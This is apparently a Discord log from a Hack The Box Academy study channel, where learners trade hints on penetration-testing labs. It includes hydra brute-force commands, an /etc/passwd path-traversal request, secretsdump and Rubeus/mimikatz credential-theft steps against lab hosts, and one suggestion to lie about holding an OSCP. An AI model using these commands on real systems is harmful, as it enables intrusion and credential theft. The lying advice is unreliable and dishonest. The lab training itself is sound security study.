#modules
can someone help me with Blind Data Exfiltration: Web Attacks
Yes, I have done it
How did you overcome the issue, if you don't mind me asking?
I'm actually going insane with this thing lol
Read the source code properly @real compass
Craft your hydra filter according to your source code, not the one from the examples in the module.
Write to me in private
I don't see the issue with the ones I've used thus far, like what should I omit. All it does is run the user against the different password lists and stop after the first successful crack.
Done 🙏🏼, any help is greatly appreciated :)
https://academy.hackthebox.com/module/143/section/1279 any hint for Q8:
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I cannot find a way to privesc
Hey guys, I am new here to this server... by chance, can any one of you guys teach me a few things about hacking? (Friday is my last day of exams so after that I will be free to learn)
Still didn't get it to work
Then try to get a reverse shell directly instead
Didn't work either
Set up a listener but it never connected
Yes
Yeah, there's a twist to that, when I was doing that module IIRC
send me the command
Ok
guys?
Sure.. you can DM
I DM
I'm on the AD Enum and Attacks assessment part 2, I've got the password for CT059 but I cannot connect to it for some reason
Can someone DM me so I don't spoil anything here
I used the creds as answers on HTB and it worked
But I cannot connect to DC01 still
Can you help me
I cannot find a way to privesc in the MS01
Could you give me a hint
what section?
assessment part 2
like 2 questions behind yours
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Does anyone have the issue with Kali when it comes to using zip2john, where it hashes it as $pkzip$ instead of $pkzip2$?
Does it still decrypt ?
It won't decrypt
As a workaround I used the Pwnbox zip2john
Just wondering if anyone knows why the Kali zip2john is different?
I prefer using my Kali as much as possible so I would like to have a fix for this issue for the future.
I didn't have issues with it ¯\_(ツ)_/¯
Is it telling you incorrect hash or is it running through and saying exhausted
exhausted
Anyone who has an OSINT corporate method?
Then it's possible it's your wordlist not the hash
Gotta ask a few things
I thought that too
until I used the Pwnbox's zip2john, then moved that hash over to my Kali
Just ask your question
and cracked it with the same list I was getting exhausted on
That's weird ¯\_(ツ)_/¯
Yeah, I'll keep researching it
It's actually that I wanted to know if the course or module is really good for that one particular topic?
No one else that's using Kali has reported that issue
Idk, probably
I have another question
You ran it with python 2.7 or 3?
Related to web application pentesting
Just ask your question, it's annoying just saying you have a question
Wasn't using either in front, just ran
zip2john ZIP.zip > ZIP.hash
On the Pwnbox it makes a hash of $pkzip2$
On the Kali it makes a hash of $pkzip$
Weird ¯\_(ツ)_/¯
yeah for sure
Hey everyone, I am at Pass the Ticket (PtT) from Linux. I got the LINUX01$ Kerberos ticket file, but I am a little lost: do I have to use a Windows host to use it, or am I supposed to crack it to get the hashes? I tried cracking it but can't crack the hash
You just need to use the cache
And the host you're on
it gives this 'kinit: Keytab contains no suitable keys for LINUX01@INLANEFREIGHT.HTB while getting initial credentials'
Well maybe there's another one
They can expire, you know
Perhaps the running service has a directory to look through
The hidden one?? But nothing there related to LINUX01
It might not directly say it. Remember, caches exist
Any hint for Q8? I don't find any way to get administrator on MS01
@acoustic owl Regarding "What is the FQDN of the host where the last octet ends with "x.x.x.203"?" Am I on the right track with this command?
for sub in $(cat /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt);do dig any $sub.internal.inlanefreight.htb @10.129.100.209;done >> tryenum35.txt
When I use the command below:
cat tryenum35.txt | grep 203
I don't find the FQDN, just the cookie id values.
Alternatively Am I on the right track with this command?
for sub in $(cat /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt);do dig axfr $sub.internal.inlanefreight.htb @10.129.100.209;done >> tryenum36.txt
In both cases I get a cookie value id that matches 203 but not the IP address. Thanks for your assistance.
It's not going to be there. Try brute forcing against all the subdomains. Internal is already open, so why brute force it?
Also not sure what you're meaning by "cookie value?"
COOKIE: d53f0f3067cf57c601000000648750a616cdfee5772034c3 (good)
Try using the DNS tool showcased
Again not sure what you mean (aka you're going down a rabbit hole)
Not sure why you're using cookies
that appeared when I grepped the result
That's because it contains 203 in it
But it's not relevant
It's in the last 6 characters. Grep just checks for the match partially in the answer
Try against all subdomains in your base axfr to inlanefreight.htb
Also the brute force tool
They have
It's really good at giving you the answer
@fathom pendant Thanks, appreciate it :). No worries, I will bruteforce the inlanefreight.htb domain. Been stuck on this for about two weeks. I can see the summit
Did I understand you correctly?
Sort of.
Step 1) identify all subdomains
Step 2) brute force them
Your answer will be in the format a.b.inlanefreight.htb
Please, can someone help me with the "Attacking common services - Hard" lab last question? (DM me please)
🥲
"Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons." Can anyone help?
Look for the service that runs the realm
Help with what? Did you do the steps?
I was advised to use Google.
I have not solved it, unfortunately.
But Google gave me a ready answer.
https://academy.hackthebox.com/module/143/section/1279 Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Could someone give me a hint please? I have been stuck here all day
What's there to solve??? You just follow the provided steps
its not a trick question
"do these things. Fill in the blank"
It is just a word, after one day thinking away from the point 🥲
A solid third or more of hacking AD is just pillaging what stuff you have access to already. If one tool doesn't provide the necessary information, try another.
Security
what
I have his credentials
I also know ||memberof||
if you look at the subdomains, it is logical which one could be a zone.
Can't be, I had all
Just had to open PowerShell with administrator -.-
sometimes it do be like that
Maybe a different version of zip2john?
Nope, didn't pass
close to pass at least?
Submitted my incomplete, half-assed 20-page report though. Gonna work on it while I wait for results, and the next step I can technically work on a little bit without exam access. So I'll be ready on the second attempt to jump straight in for the next stuff
hard to tell
Really isn't about preparing too much. I just didn't have time
ask for vacations for the exam
Bro, I'm an American
Hope it was a good experience though, you'll get it next try
There aren't holidays there?
A few, but at most I can take off like a day every couple months
I don't get paid time off
A week off work for the exam means I can't pay rent
Oh, I thought you work in IT
Depends on the job
my little corner slice of it is notoriously underpaid
junior pentester role will be almost double my current pay
getting a bit too offtopic though

Tell them you have the OSCP
They won't ask to show the title
no thanks
Well, good luck for the next attempt
hahahahahahahhahahaha
I did that though, worked out good
It always works, they just care if you are able to do the work or not
The thing is with me, I do have the knowledge to work with, but I don't have my diplomas
I am self-taught in pentesting; if you know how to pentest, mind-hack your boss
Hey guys, I wanna be a hacker
I need to learn computer basics
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Bro is funny
indeed
So you don't tolerate hackers?
I am one myself
I want to be one too
I can make money from this and it sounds cool asf
Just start with the Hack The Box Academy
and choose the penetration tester course
Penetration testing is a nicer word for hacking
How long is it gonna take until I can offer my services to people?
There isn't a timeline
you need to do this everyday
and never stop learning
Bet you're doing this a gorillion years
The most important thing of all: you have to understand what you are doing, and what the consequence of one of your decisions can be
4 years now
and still learning everyday
How did it all start for you, bud?
My English is still shit
Can't say
Where are you from?
Bulgaria
far af
The fucking balkans
So I don't know a thing about computers and tech
Do I have to read books
no
Fuck yeah
But you have to read a lot for the theory
In HTB, for example
maybe never
maybe some day
All depends on your discipline
Hi guys! Module: Attacking Common Services, Easy lab. Can't access the webshell, idk why
understand the payload you've written for webshell.php.
The hint is, you are accessing your webshell. How does your code execute commands?
Where does it expect the parameters to be fed.
@wild dragon need some help
Learn more about how user data is passed through a GET request in HTTP.
kk
got a shell, ty)
Hi everyone, I am stuck in the Skills Assessment for Broken Authentication. I think I have the account and I tried all possible combinations but same problem, any hint? "cant have requested role"
Hi, I'm stuck in Password Attacks- Pass the Ticket from Windows. I have done the first and second exercises, finding the number of users TGT and using john's tgt to perform a PTT attack via PS remoting. However, I can't find the second flag. The second question asks "Use John's TGT to perform a PTT attack and retrieve the flag from the shared folder. The only flag I see in the shared folder \DC01.inlanefreight.htb\john, the ||john.txt|| flag, but that is the answer to the third question and doesn't answer the 2nd question
Wow, getting this password in the security assessment has me wanting to run my nails down a chalkboard lol. Did anyone else find a way that didn't require port forwarding? I am able to remote into the machine but no commands get executed
You need to provide more context
check out the spaces
is this for me?
lol that's a good one
But I'm struggling with the first part of the security assessment in the Active Directory Enumeration and Attacks module. We need to get the password of the second user and I can't seem to find a way to do so
You mean the Skills Assessment? And Skills Assessment I? Which question?
yes sorry
Hi! I am very stuck on the lab Password Attacks Medium. I can access SSH with a user, and I got the doc with the documentation. I know that MySQL is on localhost but I can't connect to it. Can someone give me a hint please?
Thanks so much!!
It's like question 6, asking for the user's cleartext pw
Can you show the commands? How were you trying to connect to MySQL?
"mysql -u root -p", but I tried a lot of commands. I tried to connect with the user j* but I can't
I am looking for config files but I don't know if I am on the right way
As I said yesterday, from my notes... I used ||mimikatz||. The trick is that you have ||to get it onto the machine and then run it.|| If you're in a shell then you'll need to figure out some way of ||executing it with appropriate credentials||.
Try to look up the stuff about MySQL from Footprinting
That helped me a lot
Okey! I will continue looking for it. Thanks so much for your time!
Feel free to dm
Thanks so much! It is night here now. Tomorrow I will continue testing. Thank you for offering your help. If I can't find it, I'll ask you for a hint
Yes, I understand that part. I've been able to access the machine from the first box, but executing commands does not seem to work, nor does getting the tool over
Gl
Thanks!! Same to you and to all
I was able to upload via the ||meterpreter shell|| I established in the first question, and then ||invoke remote commands against the target machine||.
That's what I've been doing... but no luck running the tools against the target/second machine 😦
Try checking out the ||Invoke-Command function||.
That's what I've been using. I've even changed groups for the user on the initial machine and still had no luck, idk
Welp, I know the creds from the previous question work for it
I've been using them to access the second machine
What worked for me was RDP after port forwarding
yo how is it going
I tried WinRM for port forwarding and that errored out, I'll try RDP
Where are you?
what do you mean
what module
active directory enumeration and attacks - skills assessment p1 - q6
The same one I've been stuck on lol
password for ||tpetty||?
That's what I'm still trying to get, yes
What do you have?
creds for the first user we need to obtain and access to the second machine
Has anyone here made it through the Attacking Splunk section in Attacking Common Applications? I've tried following the lesson step by step, but there appears to be some missing info. Like where are certain scripts supposed to go? I've tried various combinations but every time I get the same error when I try to create the tarball. It gives me an error of directory or file not found.
It would help if there were more details in the section about how to modify the reverse_shell_splunk application and whether or not to leave the files there as they are or remove all the files and start from scratch. It seems to want you to do both, which is very confusing.
Don't you have the creds for ||svc_sql||?
yes
Did you use them?
Yes lol, I can execute some commands on the second machine as that user
But I can't execute what we need in order to answer the question
Nor can I get the right tools over
Okay, I got the tarball to finally upload on the site but after doing so, I get no response on my listener. Has anyone else had this issue with the Attacking Splunk section? I have the shell pointing back to my VM with the correct IP and port number, but I get nothing back on my listener.
I'm really not sure what I'm doing wrong because the lesson is a bit ambiguous as to where the different scripts are supposed to go and how to edit the bin and default folders properly.
@red current
Hi i am stuck in Skills Assessment for Broken Authentication i think i have the account and i try all possible combination but same problem any hint " cant have requested role " need some help
Sorry, I haven't done that module yet. I don't think it's even in the CPTS path that I'm on.
@red current it's okay, thanks
Wow, I finally got in
https://blog.mkiesel.ch/posts/oscp_pivoting/ this article just saved me lol
But mimikatz doesn't like to behave lol through my session
I was never able to get anything onto the second machine to get the password
Sorry if I'm wording it poorly, I'm trying not to give anything away
Heh, it's hard to explain things and not put the answers in the channel
Hey, has anyone solved the second part of the Skills Assessment website on Login Brute Forcing? I've tried everything and am still getting nowhere
But you can upload files to the other machines using ||Invoke-Command||. You just need to send something that makes that machine download the file.
I was never able to, and couldn't find any way to get files to the machine
I tried so many different ways lol
Okay, I started from scratch and reset the instance. I'm still running into the same issue with this section on Attacking Splunk. Does anyone know what I might be doing wrong here?
Has anyone completed this?
Yes, I've gotten past it. What's the question?
I'm just not sure what I'm doing wrong. I've spent literally hours upon hours on it so far. I cracked the first bit and am on the admin portal now. I've reused the username as stated in the hint and run it against rockyou for like an hour straight and it has accomplished nothing, nor has better default credentials. I even tried a customised password list for the name "user" and it's still done nothing.
You need to first try using the developer tools or Burp to get the password strings to get your parameters. That's how you need to start this second part. I hope that helps.
http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'" I got this ending bit and I thought this was correct
cos I used inspect to get the form name etc., so I customised it to what it should be, I believe
brb I'm having something to eat real quick.
Ah okay, all good mate
Anyone familiar with JavaScript able to help me out with the JavaScript Deobfuscation module?
I tried using Burp Suite and I can't see any alterations I should make, as the information provided was identical to that found in my HTML inspection
I'm pretty sure I found the flag by posting to http://ip/keys.php, but when I enter the flag it errors
You have to get the details of the admin panel using Burp or the developer tools.
Yeah, I've done that though, which is how I ended up with this ending
like with the form name and the URL ending etc.
Okay, so it sounds like you have everything you need to set up your attack using hydra.
Okay, this is what I just ran:
[ hydra -l user -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f -s 32607 178.62.18.68 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"]
ran this last night:
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 165.232.102.252 -s 31517 http-post-form "/admin_login.php:name=user&password=^PASS^:F=<form name='log-in'"
Try using rockyou.txt instead.
^
Okay, that looks right to me. That should work.
It doesn't though, it just runs indefinitely
I let it run for an hour yesterday and it turned up no result
Try using -t 4 to speed things up a bit.
Yeah alright, tysm, I'll keep you posted
Anyone able to assist me with deobfuscating JavaScript?
curl -s http://165.232.102.252:31339/keys.php -X POST -d "Param1=Sample" | xxd -p -r
^ this gives me a thing, but not the traditional HTB{flag_goes_here}
Also, I was able to run the obfuscated xxx.js and get the code to run and give me the flag, but it won't accept it
How long should I let it run for? It's been going for the last 10 min and turned up nothing
^ that's where I'm entering the flag from running the obfuscated JS, but it errors
It shouldn't take more than 5 or so.
Yeah, it's been going for like 20 now
Any idea what I should do, cos nothing seems to be working
Bram?
Go ahead and DM me. I'll give you a hand with it.
Alrighty thanks
Would that require me to uninstall John and reinstall it on the Kali?
Hey folks,
I have a kdbx file of version 4. John or hashcat doesn't support extraction of hashes. Any suggestions?
have you tried keepass2john
Yep. It says it doesn't support version 4
what about a keepass brute force script
looks like you can use keepass-cli to bruteforce the kdbx
https://github.com/r3nt0n/keepass4brute this might work
Well, looks like just the resource I needed. I'll give it a shot. Thank you
No prob
@arctic pelican hi friend, I sent you the guide for the SA of Broken Authentication module!
If you have any question, just text me!
If they are different versions and you need the same version, then you will have to install this version
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
Attacking Common Services - Easy ATTACKING COMMON SERVICES
Stuck with this
I am not sure how to crack the passwords, and I got this username
Focus on another service, e.g. the one where you found the username
but there is a twist that you must not forget when attacking it
What is the correct answer to the question "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"? I tried all possibilities imo, but nothing works...
from which section and module is that
I think it's from the Pivoting module
Hello, I'm in the Password Attacks module, Pass the Ticket from Windows. I'm on the first activity and I'm trying to connect to RDP using this: xfreerdp /u:Administrator /p:AnotherC0mpl3xP4$$ /v:10.129.214.47 but I get an error. These are the credentials provided in the exercise; does somebody know why this is happening?
put the password in single quotes
works!
Frustrating module that is
I don't like the wait lol
I'm at the password mutations now
filter the wordlist to have only words starting with b/B
Got it
Was already at the b's
Was like a 15-20 min wait just to finish that part lol
@slender shoal wanna DM regarding Attacking Common Services - Hard? Maybe I can give you some pointers
/module/158/section/1428 => Pivoting...
DM you if you still need help
you can get the answer in two ways
one is literally somewhere in the section and the other is to replicate the things in the section
I did, but the autoroute output seems to be wrong...
I have finished the Windows Privilege Escalation module except for the DnsAdmins section. Despite having added my user to the Domain Admins group, I still have no access to the flag file. Neither do I have access to the registry key. Do you have access to the flag file while for the registry key the permission is denied?
any help is well appreciated
have you logged out and logged back in?
yes I did, used gpupdate /force as well
But I only have disconnect from xfreerdp, no logout option
use the windows one
e.g. once you have the rdp session -> windows button -> sign out
Just did it but with a different approach: there is a shortcut, Ctrl+Alt+Delete, for command options, since even your method only shows me the Disconnect option
thanks a lot
If you want Ctrl+Alt+Delete in RDP Session, you can use Ctrl+Alt+End
on Windows to Windows RDP, this gets executed on the remote host
Hey everyone, I just want to ask: is it possible to transfer files through port forwarding?? I tried it with scp but it didn't work
"scp -P 2222 linikatz.sh julio@inlanefreight.htb@10.129.43.168:/home/julio@inlanefreight.htb"
A port forward simply forwards every packet sent to the corresponding port to the defined machine.
Example:
10.10.10.10:1234 -> 172.16.1.10:22
Any packet you send to machine 10.10.10.10 on port 1234 will then be automatically forwarded to machine 172.16.1.10 on port 22.
Yes, I get it. The pivot host in my example is configured to forward port 2222 to target port 22, but scp doesn't work, it gives 'Permission denied, please try again' although ssh works fine
you can try with using a simple method, setting up an http server on your machine and downloading the file you want on the target
since you can SSH into the 10.129.x.x subnet it means that you can communicate with it and vice versa
I think I tried it too and it didn't work, let me try it again
or use nc and cat to send and receive files over a custom port
Sorry, but there's something I don't understand. So I made a reverse connection with Chisel to my attack host on port 8080, and I want to start an HTTP server to upload a file from the victim to the attack host; on what port exactly should I start it?? I tried uploading the file to port 8080 but it won't work
A port of your choosing
As long as you can reach your attack machine from the target you are ok
it has nothing to do with port forwarding and etc
So I can use my attack host IP at the victim host upload??
try and you will see
Thanks a lot, I just get it, didn't know I can now directly connect to it
Really appreciate your time 🥰
Hope you have some good time at it
I hope you have a good time at pivoting
for all those struggling with pivoting: draw a network map on a piece of paper!
if you're not used to it or not into networking, it helps to get your head around it
Stuck on bypassing the filter on the Topology machine, can anyone help me get past this?
upp @everyone
Sup guys, any help in the Documentation & Reporting skills assessment? I do not know where to move, I am stuck at the first question. Would appreciate it if someone gave me some direction on it, thanks
On the host you will find notes. Take a close look at them. What could you do with all this information?
Like, I cannot process that info, just stuck. I am trying to perform attacks such as PtH, but nothing works, neither SMB listing
Look at this information
|| Inlanefreight Penetration Test > Evidence > Notes > 6. Credentials ||
With this you should get further
thanks a lot
some Cybersecurity training vendors limit how many times Metasploit can be used on lab exams. Here at Hack The Box, we encourage experimenting with tools in our lab environments until you have a solid foundational understanding.
HTB casually burning OffSec
Hello, I'm trying to do zip2john. I'm using this: zip2john Notes.zip > notes.hash and then I'm trying to crack it using this: john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt notes.hash but I don't get a result, can somebody help? I have this: Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:00 DONE (2023-06-13 15:49) 0g/s 18625Kp/s 18625Kc/s 18625KC/s !joley08!..*7¡Vamos! Session completed
thanks
cryolite modules are too hard and I waste a lot of time
Isn't it better? Spending 4 hours with a password is stupid
you learn nothing
You learn that it's important to find the right list.
rockyou is not a miracle cure all
Yeah, true that haha, I'm hitting 5 hours with Password Attacks Hard
that it's important to find the right list
Having trouble with the final question in Web Server Pivoting with Rpivot. I'm able to get a verified connection between my attack host and the pivot host. I then use the proxychains firefox command but the website just hangs. I figured I would try it with Pwnbox as well, but the same issue happens. I was thinking about using the NTLM authentication command but I don't know what the IP of <ip address of proxy> would be. Could use a nudge. Thanks
Thanks man. This section is absolutely horrible. The article on Medium describes it way better.
No need for NTLM authentication. Make sure you close down Firefox before running it through proxychains. Won't work otherwise
Hmmm, I never had it open to begin with. I'll try again. Thanks
If you can't get it to work, feel free to DM. I can take a closer look
I need a hint for Attacking Common Services - Hard, the question is "What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)"
I'm new here on this platform. The "find" command may be of help
you do have his creds, right?
yes
go through the available services, think about where you could find files and grab them from there
I tried a lot of ways like smbmap but I do not get anything!
All you need is smbclient
Thanks ❤️
Anyone did the Advanced SQL Injections skills assessment? I have managed to get the unauth SQLi but I have some issues with getting the login
@acoustic owl
Sorry for bothering you, but after digging for an hour I've got nothing. I actually got the password for administrator in the SMB shares, but it is not working
Try to use the password in the notes to get more credentials
Bro, what should I do here: "Submit the contents of the flag.txt file on the Administrator Desktop."
which module?
Attacking Common Services - Hard
should I exploit smh zzz_archive?
The path to that is a bit more complicated. Go through what you've learned and see if anything can help you get administrative access
Get admin privilege with the user you found
Module: Kerberos Attacks
Section: Unconstrained Delegation - Computers
Question: Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt
I used the printer bug to get a TGT and then used mimikatz to dump the NTLM hash of brian.willis. But I can't access C$
No, you first need to find more user credentials
After you have requested the ticket, you need to renew it again
did you have firefox open while attempting to run it through proxychains?
Yes, I run proxychains firefox-esr 172.16.5.135:80. Firefox opens but cannot load the page
If Firefox is open when you run that command, it won't work. Close down Firefox, then try again
I see. Thanks a lot
I did the following
- started Rubeus and used spoolsample to request dc01$ tgt
- the .\Rubeus.exe renew /ticket:doIF...... /ptt
- Mimikatz to dump brian.willis ntlm hash
- .\Rubeus.exe asktgt /rc4:888...... /user:brian.willis /ptt
Not sure what I'm missing, but getting an error
Did you manage to resolve this?
- .\Rubeus.exe renew /ticket:doI……… /ptt
Can someone help me with Windows Fundamentals? I can't access any SMB share, I just get a timeout. Rechecked the VM on the site and the VPN, everything is up
I also checked smbclient on my VM and it works perfectly
Ok, I'm gonna reset the target, maybe it will help
Yep.
Can I DM you for this?
Nah, it's not
In about 30 minutes once the painkillers and caffeine kick in. But in the meantime, make sure you don't use JD-GUI. Use fernflower. JD-GUI screws up the decompilation.
Let me try fernflower, I used JD-GUI for that
If you're at the stage I think you are, you should spot the difference immediately between the two sets of decompiled code.
@acoustic owl I really ran out of ideas. PowerView doesn't work either, I cannot even read description fields, like idk
I saw the difference, but the email is of length 15 and the password is empty, and I still didn't get the right key
Password isn't empty. It's a 60 char bcrypt hash.
Can anyone help with the skills assessment? I'm stuck on the first question
Haha.. this module channel is a warroom, I swear. Massive respect for the community people who are helping everyone pretty much for free
The AD Enumeration module is particularly a brutal module
It's one of the modules that everyone seems to get stuck on, and since it's a T2 module, it's more accessible than some of the comparably hard ones, such as Adv. SQL Injection, HTTP Attacks, etc.
This is the password column of the user table right?
It is... but you're probably hitting the other issue that I hit.
The ||black list filtering works on pieces of words, not just whole words. Look at the filter for a word that might be inside the word password||
So, on completing the Skills Assessment 2 for Windows PE: I PE'd the machine and added my user to the local administrators group. I ran mimikatz to dump the system SAM/LSA but I couldn't (I even tried again after logging out and in). But I ran it smoothly in the Administrator account, which dumped the SAM for me.
Does it have to do with the UACs?
hi
Hi, has anyone faced a credentials issue while RDPing to the target machine?
Wrong credentials, which were already mentioned in the questions part of the module
which command did you use?
Hey all, can't connect to starting point machine, anyone else have a similar issue?
Simple RDP into a Windows machine from Windows
try putting the password in single quotes
In the LLMNR/NBT-NS Poisoning - from Windows module
already tried, but same wrong credentials man
#starting-point is your best bet to find someone who can help you
ty!
It says I don't have access to that?
ty
np
what syntax are you using
ty!
Normally, RDP from a Windows machine to a target Windows machine
well, unless you provide the command (syntax) we can't help you much
No worries man, even I am unable to upload the image here
you can copy and paste the command
Man, in Windows the GUI is there for RDP
To upload an image you will have to verify your account in #welcome and #rules, but you need to have an account on https://hackthebox.com
username which you're entering into the RDP client
You can use xfreerdp through the workstation
anyone faced this issue before?
not sure why you are trying to use your main pc to connect?
earlier machines worked fine, only this one is giving me error
I believe xfreerdp automatically does the domain prepend for you, try the username with DOMAIN\username
this module
Additionally, it is not recommended to use your main PC with the VPN
Yes, but the username is htb-student only
Submitted a ticket to HTB Academy support, waiting for them to respond
INLANEFREIGHT\htb-student did you try this?
thanks man, now it works
with this INLANEFREIGHT\htb-student username
it's a domain user, so you need to prepend the domain name or it'll consider it as local login (This is for the windows RDP client)
When you do it through xfreerdp, it automatically does it for you
okay, got it, thanks man
@autumn pilot man, so would I use linux vm or the vm which is there on htb academy?
which one is recommended?
whichever makes you more comfortable
local vm would be fine then, thanks man @autumn pilot
hi i've got a machine "error" to say, can i dm a moderator please? thanks.
its supposed to work but its not working :/
i already texted people that have done it and they said it should work
I'm trying to use a PowerView function but it's not working, I import PowerView
imported*
hello
Is the Introduction to Networking module enough, or should I take CCNA or N+ to understand the network terminology that was in the labs and the pentester job path?
I am in the AD Enumeration & Attacks - Skills Assessment Part I
Last question of the assessment
"Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"
I got the clear text creds of|| t*|| but my proxychains command fails.
DC IP : 172.16.6.3 (DC01)
Webserver IP : 10.129.202.242,172.16.5.100
I ran this on webserver: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.202.242 connectport=445 connectaddress=172.16.6.3
in proxychains.conf i commented out the socks4 127.0.0.1 9050
and added socks5 10.129.202.242 8080
And when i ran this command proxychains secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3 -use-vss
I get this error:
[proxychains] Strict chain ... 10.129.202.242:8080 ... 172.16.6.3:445 <--socket error or timeout!
[-] RemoteOperations failed: [Errno Connection error (172.16.6.3:445)] [Errno 111] Connection refused
[*] Cleaning up...
Can anyone help me with what I am missing or doing wrong?
Thanks
what could be the error here?
Not being able to extend an instance might be the most annoying thing ever
|| UserSPN ||
got several errors...
@acoustic owl Can you please take a look at my question. Thanks
@acoustic owl
I also checked if windows defender is enabled but its not
so i really dont know what else can be the problem
i also restarted the machine
and tried but same stuff again
Put the error and command in chatgpt and see if it can help
this one
??
No need to go for CCNA or N+ if you understand the common concepts related to networking
CCNA is a very separate course, I am CCNP certified and I never needed it, it was just a waste of time
so, is the Network Fundamentals module enough?
I believe so
ok thanks
how do I completely clear my kali linux space and reset it to new
ffs why is this not working :((, i tried uploading a new powerview but nothing. i also tried getting a rev shell instead of evil-winrm but same stuff
Something weird is happening with my VPN connection on HTB academy. I am on eu-academy-1 server and I'm not able to make any requests on port 80 (and possibly 443) on any of the targets when connected via VPN. I can access them from the in-browser VM. Is anyone else facing this issue?
guys i really need help how do i delete kali
i want to delete all of my storage in kali and make it new
somebody help
please
In your proxychains should be the IP 127.0.0.1 instead of the IP 10.129.202.242
i also checked the md5sum values and the powerview is not corrupted
anyone has any tip for going faster on password cracking network services? it's taking forever
[DATA] max 4 tasks per 1 server, overall 4 tasks, 94044 login tries (l:1/p:94044), ~23511 tries per task
[DATA] attacking ssh://<ip>:22/
[STATUS] 41.00 tries/min, 41 tries in 00:01h, 94003 to do in 38:13h, 4 active
I'm using pwnbox to decrease the network lag already
I can't seem to figure out how to mount the backup vhd in the password attack hard labs
how do I reset my kali and delete everything to make it like new
make sure the VPN you're using matches the one selected on the academy website
which module/section?
well I know how to do it on windows but I assume you're doing it on linux?
either reinstall or run from docker in the first place
how
try #1024429874246590575 , this is the wrong channel
It is important that you know how networks work. You should know the OSI model and what happens on which layer. This helps enormously.
i even downloaded the latest powerview and transferred it from my host to ssh then from ssh to machine host
same bs
can i dm you maybe about my problem? except if ur still on ur vacation :D
I am still on vacation, but currently online. Sure, send me a DM.
I have lost the overview currently here in the channel. No idea who has what problem.
yeah look for other available services. ssh is hella slow. also make sure you use a solid amount of threads
The question asks for that
Use this wordlist to brute force the SSH password for the user "sam".
I have that happening in my dms all the time
Yup, in pwnbox...
I know, but there are other services that can be bruteforced faster. I fell for the exact same trap
filter out words starting with b/B
Absolutely horrendous lab
This is easier because everything always belongs together.
cool, thanks
thanks, it's a good idea also
yeah that's why I always pull people over to dms
Well, it's nice when others can profit a little from it as well
true I guess, but it's just too much going on usually
Huge +rep for @acoustic owl... bro being the community hero. Literally helped with my CPTS path
44 tries in 00:01h, 21068 to do in 07:59h, 4 active lol cool, I hope I wont need bruteforce too many times in cpts
Is it even possible to mount the vhd in pwnbox? Or do I need to use something external
i think it is possible
Been stuck trying to do it for 4 hours now
Tried that as well, but doesn't matter what partition I pick
Neither works
I am having this same exact problem right now. Any tips?
i did it in my vm
sudo apt-get update; sudo apt-get install dislocker -y
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -uPASSWORDHERE -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount
can you give us exact steps to reproduce? error seems weird
It's weird, it's like that other ticket just doesn't exist. I see it there when I list hidden files, but I can't operate with it or even copy it
I'll get to this in a few minutes. don't worry, didn't forget you
No worries bro, I just now got it. Didn't do anything different. Just listed the files again and I SWEAR the ticket file name changed. Used that one and it worked
ooof xD
Well glad you got it
This lab is starting to piss me off now
Command not found looks like the powerview/active directory modules aren't running
Literally spent more time mounting that damn thing than doing all of the module
I'm having a ton of issues with Password Attacks - Pass The Ticket from Linux - "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01" question if anybody here gets the chance. Not really even sure where to start here.
Look for the service that controls the realm
That directory can be useful
referring to the ||realmd ||directory?
No, I'm referring to the daemon/service that you see when you type realm
I found out what service you mean, and I'm in that directory, and I suppose I'm supposed to be looking for a ccache file, but I have either not found anything or I'm not sure what I'm looking for.
Just look around and you'll find it. That directory was just the start
just mount it in windows
linux is too complicated
That's what I ended up doing. Like 3 minutes of work, if you do this lol
.
it never worked for me but well lol
You connected to the instance with a windows vm and moved the backup to there?
shared folder between kali vm and windows host for me
so in the upload skill assessment i found a way to svg read source code but i cant seem to find the path to /upload.php
I'm sorry I'm still very lost. I feel like there is something fundamental that I'm missing
just tested the commands from payloadbunny. works for me
Just got it, thanks!
i just transfered the vhd to windows
and mounted it
i sent it to myself by mail
lol
that's about as dumb as me copying commands between host and VM via shared folder cause my copy paste is broken and I can't find a way to fix it lol
Hello all.
I had a question about the src code of a metasploit exploit used in one of the modules:
https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
if I understand this correctly, I believe it is making a GET request to this url:
GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../etc/passwd HTTP/1.1
I was curious about the need for line 53 since I was able to perform directory traversal without including that particular query.
I used this instead:
/wp-admin/tools.php?download_backup_file=../../../../../../etc/passwd HTTP/1.1
Thanks!
if you haven't found upload.php, how are you reading source code then?
I would assume it works without line 53 then. looks like that parameter isn't necessary to download a file.
Those modules aren't perfect, so there is a solid chance the parameter just exists because it was in the URL that the creator ended up with for his exploit.
Gotcha.
Thanks for the clarification!
sure thing π
New issue when trying to mount it there
Something go wrong during transfer? md5sum match?
I guess something went wrong
I used this way
switch to binary mode?
Hi david
